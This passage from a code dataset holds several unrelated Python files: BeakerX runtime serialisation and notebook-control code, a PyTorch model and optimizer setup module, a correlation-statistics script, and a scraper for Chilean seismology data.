\"ushort\") or typ.startswith(\"long\") or typ.startswith(\"ulong\"):\n return True\n if typ.startswith(\"bool\"):\n return True\n if typ.startswith(\"date\") or typ.startswith(\"Time\"):\n return True\n if typ.startswith(\"str\"):\n return True\n return False\n\n\ndef isListOfMaps(data):\n if type(data) != list:\n return False\n for w in data:\n if type(w) != dict:\n return False\n for v in w.values():\n if not isPrimitiveType(type(v).__name__):\n return False\n return True\n\n\ndef isDictionary(data):\n if type(data) != dict:\n return False\n for v in data.values():\n if not isPrimitiveType(type(v).__name__):\n return False\n return True\n\n\ndef transformNaN(obj):\n if not isinstance(obj, float):\n return obj\n if math.isnan(obj):\n return \"NaN\"\n if math.isinf(obj):\n if obj > 0:\n return \"Infinity\"\n else:\n return \"-Infinity\"\n return obj\n\n\ndef transformNaNs(obj):\n for x in range(0, len(obj)):\n i = obj[x]\n if not isinstance(i, float):\n continue\n if math.isnan(i):\n obj[x] = \"NaN\"\n if math.isinf(i):\n if i > 0:\n obj[x] = \"Infinity\"\n else:\n obj[x] = \"-Infinity\"\n\n\ndef fixNaNBack(obj):\n if not isinstance(obj, str):\n return obj\n if obj == \"NaN\":\n return float('nan')\n if obj == \"Infinity\":\n return float('inf')\n if obj == \"-Infinity\":\n return float('-inf')\n return obj\n\n\ndef fixNaNsBack(obj):\n for x in range(0, len(obj)):\n i = obj[x]\n if not isinstance(i, str):\n continue\n if i == \"NaN\":\n obj[x] = float('nan')\n if i == \"Infinity\":\n obj[x] = float('inf')\n if i == \"-Infinity\":\n obj[x] = float('-inf')\n\n\ndef transform(obj):\n if type(obj) == bytes:\n return str(obj)\n if isListOfMaps(obj):\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"ListOfMaps\"\n cols = []\n for l in obj:\n cols.extend(l.keys())\n cols = list(set(cols))\n out['columnNames'] = cols\n vals = []\n for l in obj:\n row = []\n for r in cols:\n if r in l:\n row.append(transform(l[r]))\n else:\n row.append('')\n vals.append(row)\n out['values'] = vals\n return out\n if isDictionary(obj):\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Dictionary\"\n out['columnNames'] = [\"Key\", \"Value\"]\n values = []\n for k, v in obj.items():\n values.append([k, transform(v)])\n out['values'] = values\n return out\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[k] = transformNR(v)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformNR(v))\n return out\n if isinstance(obj, OutputContainer):\n out = {}\n out['type'] = \"OutputContainer\"\n items = []\n for v in obj.getItems():\n items.append(transform(v))\n out['items'] = items\n return out\n if isinstance(obj, BeakerCodeCell):\n out = {}\n out['type'] = \"BeakerCodeCell\"\n out['cellId'] = obj.getCellId()\n out['evaluatorId'] = obj.getEvaluatorId()\n out['code'] = obj.getCode()\n out['outputtype'] = obj.getOutputType()\n out['output'] = transformNR(obj.getOutput())\n out['tags'] = obj.getTags()\n return out\n if isinstance(obj, BaseObject):\n return obj.transform()\n return transformNaN(obj)\n\n\ndef transformNR(obj):\n if type(obj) == bytes:\n return str(obj)\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[k] = transformNR(v)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformNR(v))\n return out\n if isinstance(obj, OutputContainer):\n out = {}\n out['type'] = \"OutputContainer\"\n items = []\n for v in obj.getItems():\n items.append(transform(v))\n out['items'] = items\n return out\n if 
isinstance(obj, BeakerCodeCell):\n out = {}\n out['type'] = \"BeakerCodeCell\"\n out['cellId'] = obj.getCellId()\n out['evaluatorId'] = obj.getEvaluatorId()\n out['code'] = obj.getCode()\n out['outputtype'] = obj.getOutputType()\n out['output'] = transformNR(obj.getOutput())\n out['tags'] = obj.getTags()\n return out\n if isinstance(obj, BaseObject):\n return obj.transform()\n return transformNaN(obj)\n\n\ndef transformBack(obj):\n if type(obj) == dict:\n out = {}\n for k, v in obj.items():\n out[str(k)] = transformBack(v)\n if \"type\" in out:\n if out['type'] == \"Plot\" \\\n or out['type'] == \"TimePlot\" \\\n or out['type'] == \"NanoPlot\" \\\n or out['type'] == \"SimpleTimePlot\" \\\n or out['type'] == \"CombinedPlot\":\n return chart.transformBack(out)\n if out['type'] == 'EasyForm':\n return easyforms.transformBack(out)\n if out['type'] == \"BeakerCodeCell\":\n c = BeakerCodeCell(out['cellId'], out['evaluatorId'])\n if 'code' in out:\n c.code = out['code']\n if 'outputtype' in out:\n c.outputtype = out['outputtype']\n if 'output' in out:\n c.output = transformBack(out['output'])\n if 'tags' in out:\n c.tags = out['tags']\n return c\n if out['type'] == \"OutputContainer\":\n c = OutputContainer()\n if 'items' in out:\n for i in out['items']:\n c.addItem(i)\n return c\n if out['type'] == \"Date\":\n return datetime.fromtimestamp(out[\"timestamp\"] / 1000)\n if out['type'] == \"TableDisplay\":\n if 'subtype' in out:\n if out['subtype'] == \"Dictionary\":\n out2 = {}\n for r in out['values']:\n out2[r[0]] = fixNaNBack(r[1])\n if out['columnNames'][0] == \"Index\":\n return pandas.Series(out2)\n return out2\n if out['subtype'] == \"Matrix\":\n vals = out['values']\n fixNaNsBack(vals)\n return numpy.matrix(vals)\n if out['subtype'] == \"ListOfMaps\":\n out2 = []\n cnames = out['columnNames']\n for r in out['values']:\n out3 = {}\n for i in range(len(cnames)):\n if r[i] != '':\n out3[cnames[i]] = r[i]\n out2.append(out3)\n return out2\n # transform to dataframe\n if ('hasIndex' in out) and (out['hasIndex'] == \"true\"):\n # first column becomes the index\n vals = out['values']\n cnames = out['columnNames'][1:]\n index = []\n for x in range(0, len(vals)):\n index.append(transformBack(vals[x][0]))\n v = vals[x][1:]\n fixNaNsBack(v)\n vals[x] = v\n if len(out['indexName']) > 1:\n index = pandas.MultiIndex.from_tuples(index, names=(out['indexName']))\n else:\n index = pandas.Index(index, name=', '.join((out['indexName'])))\n frame = pandas.DataFrame(data=vals, columns=cnames, index=index)\n return frame\n else:\n vals = out['values']\n cnames = out['columnNames']\n for x in range(0, len(vals)):\n v = vals[x]\n fixNaNsBack(v)\n vals[x] = v\n return pandas.DataFrame(data=vals, columns=cnames)\n return out\n if type(obj) == list:\n out = []\n for v in obj:\n out.append(transformBack(v))\n return out\n try:\n if type(obj) == bytes:\n obj = str(obj)\n except Exception as e:\n return obj\n return obj\n\n\n# should be inner class to BeakerX\nclass DataFrameEncoder(json.JSONEncoder):\n def default(self, obj):\n # similarly handle Panels.\n # make this extensible by the user to handle their own types.\n if isinstance(obj, numpy.generic):\n return transformNaN(obj.item())\n if isinstance(obj, numpy.ndarray) and obj.ndim == 2:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Matrix\"\n cols = []\n for i in range(obj.shape[1]):\n cols.append(\"c\" + str(i))\n out['columnNames'] = cols\n vars = obj.tolist()\n for x in range(0, len(vars)):\n transformNaNs(vars[x])\n out['values'] = vars\n 
return out\n if isinstance(obj, numpy.ndarray):\n ret = obj.tolist()\n transformNaNs(ret)\n return ret\n if type(obj) == datetime or type(obj) == datetime.date or type(obj).__name__ == 'Timestamp':\n out = {}\n out['type'] = \"Date\"\n out['timestamp'] = time.mktime(obj.timetuple()) * 1000\n return out\n if type(obj) == pandas.core.frame.DataFrame:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"TableDisplay\"\n out['hasIndex'] = \"true\"\n out['columnNames'] = (['Index'] if obj.index.name is None else obj.index.names) + obj.columns.tolist()\n out['indexName'] = ['index'] if (len(obj.index.names) == 1) and (\n obj.index.names[0] is None) else obj.index.names\n vals = obj.values.tolist()\n idx = obj.index.tolist()\n for x in range(0, len(vals)):\n vals[x] = [idx[x]] + vals[x]\n ty = []\n num = len(obj.columns.tolist())\n x = 0\n for x in range(0, num + 1):\n ty.append(convertTypeName(type(vals[0][x]).__name__))\n out['types'] = ty\n for x in range(0, len(vals)):\n transformNaNs(vals[x])\n out['values'] = vals\n return out\n if type(obj) == pandas.core.series.Series:\n basict = True\n for i in range(len(obj)):\n if not isPrimitiveType(type(obj[i]).__name__):\n basict = False\n break\n if basict:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Dictionary\"\n out['columnNames'] = [\"Index\", \"Value\"]\n values = []\n for k, v in obj.items():\n values.append([k, transform(v)])\n out['values'] = values\n return out\n return obj.to_dict()\n if type(obj).__name__ == 'Timedelta' or type(obj).__name__ == 'TimedeltaIndex':\n return\n return json.JSONEncoder.default(self, obj)\n\n\nclass MyJSONFormatter(IPython.core.formatters.BaseFormatter):\n format_type = Unicode('application/json')\n\n def __call__(self, obj):\n try:\n obj = transform(obj)\n return json.dumps(obj, cls=DataFrameEncoder)\n except Exception as e:\n # print(e)\n # traceback.print_exc()\n return None\n\n\nfrom .beakerx_server import BeakerxZMQServer\nfrom queue import Queue\n\n\nclass BeakerX:\n\n def __init__(self):\n self._comm = None\n self._queue = Queue()\n self._server = BeakerxZMQServer(self._queue)\n self._url = self._server.url\n if BeakerXTabledisplay is not None:\n BeakerXTabledisplay.pandas_display_table()\n\n @staticmethod\n def pandas_display_default():\n pandas.DataFrame._ipython_display_ = None\n\n @staticmethod\n def pandas_display_table():\n if BeakerXTabledisplay is not None:\n BeakerXTabledisplay.pandas_display_table()\n else:\n html = BeakerxHTML()\n html.value = 'You need beakerx_tabledisplay to use this'\n IPython.display.display_html(html)\n\n def set4(self, var, val, unset, sync):\n args = {'name': var, 'sync': sync}\n if not unset:\n val = transform(val)\n args['value'] = json.dumps(val, cls=DataFrameEncoder)\n state = {'state': args}\n if self._comm is None:\n self.init_autotranslation_comm()\n self._comm.send(data=state)\n\n def init_autotranslation_comm(self):\n self._comm = Comm(target_name='beakerx.autotranslation')\n self._comm.open()\n\n def get(self, var):\n result = autotranslation_get(var)\n if result == 'undefined':\n raise NameError('name \\'' + var + '\\' is not defined on the beakerx object')\n return transformBack(json.loads(result))\n\n def set_session(self, id):\n self.session_id = id\n\n def register_output(self):\n ip = IPython.InteractiveShell.instance()\n ip.display_formatter.formatters['application/json'] = MyJSONFormatter(parent=ip.display_formatter)\n\n def set(self, var, val):\n autotranslation_update(var, val)\n return self.set4(var, val, False, 
True)\n\n def unset(self, var):\n return self.set4(var, None, True, True)\n\n def isDefined(self, var):\n return autotranslation_get(var) != 'undefined'\n\n def createOutputContainer(self):\n return OutputContainer()\n\n def showProgressUpdate(self):\n return \"WARNING: python3 language plugin does not support progress updates\"\n\n def evaluate(self, filter):\n args = {'filter': filter, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/evaluate',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def evaluateCode(self, evaluator, code):\n args = {'evaluator': evaluator, 'code': code, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/evaluateCode',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def showStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/showStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def clearStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/clearStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def showTransientStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/showTransientStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def getEvaluators(self):\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/getEvaluators?' +\n urllib.parse.urlencode({\n 'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def getVersion(self):\n req = urllib.request.Request(\n self.core_url + '/rest/util/version?' + urllib.parse.urlencode({'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n return transformBack(conn.read().decode())\n\n def getVersionNumber(self):\n req = urllib.request.Request(\n self.core_url + '/rest/util/getVersionInfo?' + urllib.parse.urlencode({'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result['version'])\n\n def getCodeCells(self, filter):\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/getCodeCells?' 
+\n urllib.parse.urlencode({\n 'filter': filter}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def setCodeCellBody(self, name, body):\n args = {'name': name, 'body': body, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellBody',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def setCodeCellEvaluator(self, name, evaluator):\n args = {'name': name, 'evaluator': evaluator, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellEvaluator',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def setCodeCellTags(self, name, tags):\n args = {'name': name, 'tags': tags, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellTags',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def runByTag(self, tag):\n arguments = dict(target_name='beakerx.tag.run')\n comm = Comm(**arguments)\n msg = {'runByTag': tag}\n state = {'state': msg}\n comm.send(data=state, buffers=[])\n\n def urlArg(self, argName):\n arguments = dict(target_name='beakerx.geturlarg')\n comm = Comm(**arguments)\n state = {\n 'name': 'URL_ARG',\n 'arg_name': argName\n }\n data = {\n 'state': state,\n 'url': self._url,\n 'type': 'python'\n }\n\n comm.send(data=data, buffers=[])\n data = self._queue.get()\n params = json.loads(data)\n return params['argValue']\n\n def __setattr__(self, name, value):\n if 'session_id' == name:\n self.__dict__['session_id'] = value\n return\n if '_comm' == name:\n self.__dict__['_comm'] = value\n return\n if '_url' == name:\n self.__dict__['_url'] = value\n return\n if '_queue' == name:\n self.__dict__['_queue'] = value\n return\n if '_server' == name:\n self.__dict__['_server'] = value\n return\n return self.set(name, value)\n\n def __getattr__(self, name):\n if '_comm' == name:\n return self.__dict__['_comm']\n if '_url' == name:\n return self.__dict__['_url']\n if '_queue' == name:\n return self.__dict__['_queue']\n if '_server' == name:\n return self.__dict__['_server']\n return self.get(name)\n\n def __contains__(self, name):\n return self.isDefined(name)\n\n def __delattr__(self, name):\n return self.unset(name)\n\n\ndef autotranslation_update(var, val):\n session_id = get_context_session()\n port = os.environ[\"BEAKERX_AUTOTRANSLATION_PORT\"]\n url = 'http://localhost:{0}/autotranslation/'.format(port)\n json_data = json.dumps(transform(val), cls=DataFrameEncoder)\n data = {}\n data[\"name\"] = var\n data[\"json\"] = json_data\n data[\"sessionId\"] = session_id\n requests.post(url, data=json.dumps(data), headers={'Authorization': get_auth_token()})\n\n\ndef autotranslation_get(var):\n port = os.environ[\"BEAKERX_AUTOTRANSLATION_PORT\"]\n session_id = get_context_session()\n url = 'http://localhost:{0}/autotranslation/{1}/{2}'.format(port, session_id, var)\n result = requests.get(url, headers={'Authorization': get_auth_token()})\n return transformBack(result.content.decode())\n\n\ndef get_auth_token():\n token_string = 'beakerx:' + os.environ['BEAKERX_AUTOTRANSLATION_PASSWORD']\n return 'Basic ' + base64.b64encode(token_string.encode('utf-8')).decode()\n\n\ndef get_context_session():\n 
kernel = get_ipython().kernel\n # if subkernel get session from extra start parameters\n if len(kernel.parent.argv) == 3:\n context_json = base64.b64decode(kernel.parent.argv[2]).decode('UTF-8')\n return json.loads(context_json)['contextId']\n return kernel.session.session\n","repo_name":"twosigma/beakerx_widgets","sub_path":"beakerx_widgets/beakerx/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":23975,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"15860248446","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import DataGenerator, dataset_collate\n\nfrom .architectures.alexnet import alexnet\nfrom .architectures.squeezenet import squeezenet\nfrom .architectures.shufflenet import shufflenetv2\nfrom .architectures.resnet import resnet18, resnet34, resnet50, resnet101, resnet152\nfrom .architectures.resnet import resnext50_32x4d, resnext101_32x8d\nfrom .architectures.inception import inception_v3\nfrom .architectures.googlenet import googlenet\nfrom .architectures.efficientnet import efficientnet\nfrom .architectures.mobilenet import mobilenet_v2\nfrom .architectures.senet import se_resnet50, se_resnet101, se_resnet152, se_resnet50_fc512\nfrom .architectures.senet import se_resnext50_32x4d, se_resnext101_32x4d\nfrom .architectures.vgg16 import vgg16\nfrom .architectures.densenet import densenet\nfrom .architectures.vit import vit\n\n\n\ndef get_model(net_type, input_shape, pretrained=False, output_size=2):\n if net_type == 'alexnet':\n model = alexnet(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n elif net_type == 'squeezenet':\n model = squeezenet(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n elif net_type == 'shufflenet':\n model = shufflenetv2(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'resnet152':\n model = resnet152(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'resnext101_32x8d':\n model = resnext101_32x8d(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'inception_v3':\n model = inception_v3(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'googlenet':\n model = googlenet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'efficientnet':\n model = efficientnet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'mobilenet_v2':\n model = mobilenet_v2(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnet152':\n model = se_resnet152(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnet50_fc512':\n model = se_resnet50_fc512(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnext101_32x4d':\n model = se_resnext101_32x4d(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'vgg16':\n model = vgg16(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'densenet':\n model = densenet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'vit':\n model = vit(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n\n else:\n raise Exception('Unknown architecture type') \n \n return model \n\nclass FocalLoss(nn.Module):\n def __init__(self, gamma = 2, eps = 1e-7):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.eps = eps\n self.ce = 
nn.CrossEntropyLoss()\n\n def forward(self, input, target):\n logp = self.ce(input, target)\n p = torch.exp(-logp)\n loss = (1 - p) ** self.gamma * logp\n return loss.mean()\n \ndef init_loss(criterion_name):\n\n if criterion_name=='bce':\n loss = nn.BCEWithLogitsLoss()\n elif criterion_name=='cce':\n loss = nn.CrossEntropyLoss() \n elif criterion_name == 'focal_loss':\n loss = FocalLoss()\n else:\n raise Exception('This loss function is not implemented yet.') \n\n return loss \n\n\ndef get_optimizer(model, opt, optimizer_type): \n optimizer = {\n 'adam' : optim.Adam(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\n 'adamw' : optim.AdamW(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\n 'sgd' : optim.SGD(model.parameters(), opt.Init_lr_fit, momentum = opt.momentum, nesterov=True, weight_decay = opt.weight_decay)\n }[optimizer_type] \n return optimizer\n\n\ndef generate_loader(opt): \n train_dataset = DataGenerator(opt.lines[:opt.num_train], opt.input_shape, True)\n val_dataset = DataGenerator(opt.lines[opt.num_train:], opt.input_shape, False)\n\n # gen = DataLoader(train_dataset, shuffle = True, batch_size = opt.batch_size, num_workers = opt.num_workers, pin_memory=True,\n # drop_last=True, collate_fn=dataset_collate)\n # gen_val = DataLoader(val_dataset , shuffle = True, batch_size = opt.batch_size, num_workers = opt.num_workers, pin_memory=True, \n # drop_last=True, collate_fn=dataset_collate) \n\n batch_size = opt.batch_size\n if opt.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True,)\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False,)\n batch_size = batch_size // opt.ngpus_per_node\n shuffle = False\n else:\n train_sampler = None\n val_sampler = None\n shuffle = True\n\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\n drop_last=True, collate_fn=dataset_collate, sampler=train_sampler)\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \n return gen, gen_val","repo_name":"Leyan529/pytorch-image-classification","sub_path":"models/init_model.py","file_name":"init_model.py","file_ext":"py","file_size_in_byte":5852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28109069215","text":"\n\"\"\"\nPearson Rho, Spearman Rho, and Kendall Tau\n\nCorrelation algorithms\n\nDrew J. 
Nase\n\nExpects path to a file containing data series - \none per line, separated by one or more spaces.\n\"\"\"\n\nimport math\nimport sys\nimport string\nimport json\nfrom itertools import combinations\n\n# if len(sys.argv) > 1:\n# #data file given as arg\n# filename = sys.argv[1]\n# else:\n# sys.exit(\"Usage: python \" + sys.argv[0] + \" [matrix filename]\")\n\n# x = []\n# y = []\n\n# def split_values(v):\n# buff = map(string.strip, string.split(v, \" \"))\n# x.append(float(buff[0]))\n# y.append(float(buff[1]))\n\n#x, y must be one-dimensional arrays of the same length\n\n#Pearson algorithm\ndef pearson(x, y):\n assert len(x) == len(y)\n q = lambda n: len(n) * sum(map(lambda i: i ** 2, n)) - (sum(n) ** 2)\n return (len(x) * sum(map(lambda a: a[0] * a[1], zip(x, y))) - sum(x) * sum(y)) / math.sqrt(q(x) * q(y))\n\n#Spearman algorithm\ndef spearman(x, y):\n assert len(x) == len(y)\n q = lambda n: map(lambda val: sorted(n).index(val) + 1, n)\n d = sum(map(lambda x, y: (x - y) ** 2, q(x), q(y)))\n return 1.0 - 6.0 * d / float(len(x) * (len(y) ** 2 - 1.0))\n\n#Kendall algorithm\ndef kendall(x, y):\n assert len(x) == len(y)\n c = 0 #concordant count\n d = 0 #discordant count\n t = 0 #tied count\n for (i, j) in combinations(range(len(x)), 2):\n s = (x[i] - x[j]) * (y[i] - y[j])\n if s:\n c += 1\n d += 1\n if s > 0:\n t += 1\n elif s < 0:\n t -= 1\n else:\n if x[i] - x[j]:\n c += 1\n elif y[i] - y[j]:\n d += 1\n return t / math.sqrt(c * d)\n\n\n\n\ndef sub2score(json_file):\n temp_json = {}\n for i in json_file[\"Result\"]:\n # print(f'subnet: {i[\"subnet\"]}, score: {i[\"score\"]}')\n temp_json[str(i[\"subnet\"])] = i[\"score\"]\n\n return temp_json\n\n\ndef Top_k_list(Result_dict, My_dict, K = 100):\n\n Re_num_score = {}\n Re_k_list = []\n My_k_list = []\n for num in Result_dict:\n if int(num) < 4444444:\n Re_num_score[num] = Result_dict[num][\"mean\"]\n sorted_subnet = sorted(Re_num_score.items(), key=lambda i: i[1], reverse=True)\n sorted_subnet_key = [x[0] for x in sorted_subnet]\n Result_topk = sorted_subnet_key[:K]\n for i in Result_topk:\n Re_k_list.append(Re_num_score[i])\n My_k_list.append(My_dict[i])\n \n print(f'key: {Result_topk}, Re_k_list: {Re_k_list}, My_k_list: {My_k_list}')\n\n return Re_k_list, My_k_list\n\n\n\n\n\n\n\n\n\n\nMy_results = \"json_results/bin20_min1_bcnet_3_resnet.json\"\nRecord_results = \"json_results/record_json/Results_ResNet.json\"\n\n\nwith open(My_results,'r') as load_f:\n My_dict = json.load(load_f)\n\nwith open(Record_results,'r') as load_f:\n Re_dict = json.load(load_f)\n\nMy_temp = sub2score(My_dict)\n\n\n\n# Re_list, My_list = Top_k_list(Re_dict, My_temp, K = 100)\n\n\nMy_list = []\nRe_list = []\n\nfor num in Re_dict:\n if int(num) < 4444444:\n if '1' not in num:\n Re_list.append(Re_dict[num][\"mean\"])\n My_list.append(My_temp[num])\n\n\nprint('Pearson Rho: %f' % pearson(My_list, Re_list))\n\nprint('Spearman Rho: %f' % spearman(My_list, Re_list))\n\nprint('Kendall Tau: %f' % kendall(My_list, Re_list))","repo_name":"simrit1/BCNetV2","sub_path":"BCNetV2/example/classification/pearson_kendall_spearman.py","file_name":"pearson_kendall_spearman.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"20709987490","text":"import geopy\nfrom geopy.distance import geodesic\nfrom unittest import result\nfrom bs4 import BeautifulSoup\nimport requests\nfrom datetime import datetime\nimport urllib.request\nimport pandas as pd\n\ntiempo = 
datetime.today().strftime('%Y/%m/%Y%m%d')\n\ne = urllib.request.urlopen(f\"http://www.sismologia.cl/sismicidad/catalogo/{tiempo}.html\").read()\nsoup = BeautifulSoup(e, 'html.parser')\n\n\n # Obtenemos la tabla\n\ntabla_sismos = soup.find('table', attrs={'class':'sismologia detalle'})\n\n# Obtenemos todas las filass\nrows = tabla_sismos.find_all('tr')\n\n# output_data = []\n# for row in rows:\n# cells = row.find_all('th')\n# output_dat = []\n# if len(cells) > 0:\n# for cell in cells:\n# output_data.append(cell.text)\n# output_data.append(output_dat)\n\n# dataset = pd.DataFrame(output_data)\n\ndelimiter = \",\" # unambiguous string\nfor line_break in soup.findAll('br'): # loop through line break tags\n line_break.replaceWith(delimiter) # replace br tags with delimiter\nstrings = soup.get_text().split(delimiter) # get list of strings\n\noutput_rows = []\nfor row in rows:\n # obtenemos todas las columns\n cells = row.find_all(\"td\")\n output_row = []\n if len(cells) > 0:\n for cell in cells:\n output_row.append(cell.get_text())\n output_rows.append(output_row)\n\ndataset = pd.DataFrame(output_rows).drop_duplicates()\n\n\ndataset.columns = [\n \"Fecha Local / Lugar\",\n \"Fecha UTC\",\n \"Latitud / Longitud\",\n \"Profundidad\",\n \"Magnitud (2)\",\n ]\n\n# dataset[[\"Fecha Local / Lugar\"]] = dataset[[\"Fecha Local / Lugar\"]].astype(str)\n\n# dataset[\"Fecha Local / Lugar\"].str.replace(\" \",\"\", 1)\n\n\ndataset[[\"Fecha Local\", \"Lugar\"]] = dataset[\"Fecha Local / Lugar\"].str.split(r\",\", expand=True)\n\ndataset[[\"Latitud\", \"Longitud\"]] = dataset[\"Latitud / Longitud\"].str.split(r\",\", expand=True)\n\ndataset[[\"Latitud\", \"Longitud\"]] = dataset[[\"Latitud\", \"Longitud\"]].apply(pd.to_numeric)\n\ndataset_filter = dataset[\n (-27.100 <= dataset[\"Latitud\"])\n & (dataset[\"Latitud\"] <= -21.680)\n & (-72.150 <= dataset[\"Longitud\"])\n & (dataset[\"Longitud\"] <= -66.180)\n ]\n\n\n\ntranque = (-24.39,-69.14)\n\nlatitud1 = dataset_filter['Latitud'].values[0]\nlongitud1 = dataset_filter['Longitud'].values[0]\nprofundidad = dataset_filter['Profundidad'].values[0]\nmagnitud = dataset_filter['Magnitud (2)'].values[0]\nmagnitud2 = magnitud.split(' ')\nmagnitud3 = float(magnitud2[0])\nmagnitud4 = magnitud2[1]\ndelhi = (latitud1, longitud1)\ndistancia = int(round((geodesic(tranque, delhi).km)))\n\nprint (magnitud3)\nprint (distancia)\n\n# dataset.to_excel(\"test.xlsx\")\n# dataset[[\"Fecha Local\", \"Lugar\"]] = dataset[\"Fecha Local / Lugar\"].str.replace(\" \",\"\", 1)\n\ndataset_filter.to_excel(\"test.xlsx\")\n\n# dataset[[\"Latitud\", \"Longitud\"]] = dataset[[\"Latitud\", \"Longitud\"]].apply(pd.to_numeric)\n# dataset_filter = dataset[\n# (-27.100 <= dataset[\"Latitud\"])\n# & (dataset[\"Latitud\"] <= -21.680)\n# & (-72.150 <= dataset[\"Longitud\"])\n# & (dataset[\"Longitud\"] <= -66.180)\n# ]\n\nprint (dataset_filter)\n","repo_name":"brunooviedo/test","sub_path":"test_bk.py","file_name":"test_bk.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20938957774","text":"from unittest import TestCase\r\n\r\nimport lark.exceptions\r\nimport pytest\r\n\r\nfrom parm import parsers\r\nfrom parm.api.parsing import arm_pat\r\nfrom parm.api.parsing import arm_asm\r\n\r\nfrom parm.api.parsing.arm_pat import BlockPat, CommandPat, InstructionPat, OperandsPat, OpcodePat, RegPat\r\nfrom parm.api.parsing.arm_pat import AddressPat, WildcardSingle, Label, PythonCodeLine, PythonCodeLines\r\nfrom 
